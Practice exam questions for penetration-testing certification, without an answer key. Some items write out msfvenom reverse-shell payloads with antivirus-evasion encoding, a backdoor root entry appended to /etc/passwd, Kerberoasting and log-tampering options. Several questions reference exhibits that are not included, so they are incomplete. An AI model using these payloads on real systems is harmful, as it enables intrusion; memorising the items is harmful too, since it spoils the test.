Pentest 5

During a penetration test for a client that has a diverse infrastructure, the tester scans the network using Nmap and observes the following output: Which of the following would most likely be the target device?. Switch. SCADA. IoT. Router.

A tester compromises a shared host that is manually audited every week due to the absence of a SIEM. Which of the following is the best way to reduce the chances of being detected?. Modify files located in the /var/log directory. Use the clear command to remove recent terminal activity. Perform commands under one of the developer accounts. Disable all logging services on the host.

A penetration tester wants to verify whether passwords from a leaked password list can be used to access an SSH server as a legitimate user. Which of the following is the most appropriate tool for this task?. BloodHound. Responder. Burp Suite. Hydra.

A penetration tester discovers a deprecated directory in which files are accessible to anyone. Which of the following would most likely assist the penetration tester in finding sensitive information without raising suspicion?. Enumerating cached pages available on web pages. Looking for externally available services. Scanning for exposed ports associated with the domain. Searching for vulnerabilities and potential exploits.

A penetration tester gains initial access to a Windows workstation on a client’s network. The tester wants to determine the next target but does not want to install software on the workstation. Which of the following is the best tool to list potential targets?. mmc.exe. Netstat. Mimikatz. explorer.exe. CME.

A penetration tester completes an authenticated vulnerability scan of a host and receives the following results: Which of the following is most likely to cause stability when a session is created on a target machine?. Running Responder with default settings and using Impacket. Running Nmap with safe scripts enabled and targeting RDP. Running Metasploit utilizing the EternalBlue module. Running Hydra on the local user at one attempt per second.

A penetration tester uses the Intruder tool from the Burp Suite Community Edition while assessing a web application. The tester notices the test is taking too long to complete. Which of the following tools can the tester use to accelerate the test and achieve similar results?. TruffleHog. Postman. Wfuzz. WPScan.

A penetration tester is ready to add shellcode for a specific remote executable exploit. The tester is trying to prevent the payload from being blocked by antimalware that is running on the target. Which of the following commands should the tester use to obtain shell access?. msfvenom --arch x86-64 --platform windows --encoder x86-64/shikata_ga_nai --payload windows/bind_tcp LPORT=443. msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.100 LPORT=8000. msfvenom --arch x86-64 --platform windows --payload windows/shell_reverse_tcp LHOST-10.10.10.100 LPORT-4444 EXITFUNC=none. net user add /administrator | hexdump > payload.

A Chief Information Security Officer wants to automate adversarial activities from penetration tests that are relevant to the organization. Which of the following should a penetration tester do first to accomplish this task?. Deploy a command-and-control server with custom profiles to facilitate execution. Use Python 3 with added testing libraries and script the relevant action to test. Utilize the PowerShell PowerView tool with custom scripting additions based on test results. Implement Atomic Red Team to chain critical TTPs and perform the test.

A penetration tester identifies an exposed corporate directory containing first and last names and phone numbers for employees. Which of the following attack techniques would be the most effective to pursue if the penetration tester wants to compromise user accounts?. Smishing. Impersonation. Tailgating. Whaling.

During an assessment, a penetration tester obtains access to a Microsoft SQL server using sqlmap and runs the following command: SQL> xp_cmdshell whoami /all - Which of the following is the tester trying to do?. List database tables. Show logged-in database users. Enumerate privileges. Display available SQL commands.

During a security assessment of a network device, a penetration tester performs the following: Which of the following actions should the tester take to correct the vulnerability scan attempt?. Enable promiscuous mode. Modify -Tuning to 1. Verify the ports used. Remove the -evasion flag.

During an assessment, a penetration tester runs the following command from a Linux machine: GetUsersSPNs.py -dc-ip 172.16.1.1 DOMAIN.LOCAL/aholliday -request Which of the following is the penetration tester trying to do?. Crack the user password for aholliday. Download all TGS tickets for offline processing. Perform a pass-the-hash attack using the hash for aholliday. Perform password spraying.

A penetration tester gains low-privilege shell access to a host and discovers a world-writable script that is run regularly as root. The tester runs the following command: openssl passwd password $l$OjxLvZ85$Fdr51vn/Z4zXWsQR/Xrj . The tester then adds the following line to the world-writable script echo 'root2:$l$OjxLvZ85$Fdr51vn/Z4zXWsQR/Xrj1001:1001:,,,: /root:/bin/bash" >> /etc/passwd Which of the following should the penetration tester do to enable this exploit to work correctly?. Use only a single redirect to /etc/password. Generate the password using md5sum. Log in to the host using SSH. Change the 1001 entries to 0.

A penetration tester successfully phishes a user and compromises a domainjoined endpoint. The tester enumerates the domain controller and discovers that Group Policy Preferences are in use. The tester also finds that the version of the domain controllers is Windows Server 2012. The tester wants to use the fastest possible method of pivoting successfully to multiple production servers joined to the domain. Which of the following is the best way to achieve this goal?. Scan the domain controller and locate an RCE using a Metasploit module with a reverse shell. Run Hydra to password spray any dumped credentials from the initial host across subnets. Use BloodHound to look for escalation paths against the AD environment. Find the SYSVOL share for hashes with findstr /i and decrypt using the published key.

A penetration tester gains access to the target network and observes a running SSH server. Which of the following techniques should the penetration tester use to obtain the version of SSH running on the target server?. Network sniffing. IP scanning. Banner grabbing. DNS enumeration.

A company that uses an insecure corporate wireless network is concerned about security. Which of the following is the most likely tool a penetration tester could use to obtain initial access?. Responder. Metasploit. Netcat. Nmap.

A penetration tester needs to quickly transfer an exploit from a Linux system to a Windows 10 system within the network. Which of the following is the best way to accomplish this task?. nc -lvp 8080. nc -lnvp 443. python3 -m http.server 80. neat -lvp 8080.

A penetration tester downloads a JAR file that is used in an organization’s production environment. The tester evaluates the contents of the JAR file to identify potentially vulnerable components that can be targeted for exploit. Which of the following describes the tester's activities?. SAST. SBOM. ICS. SCA.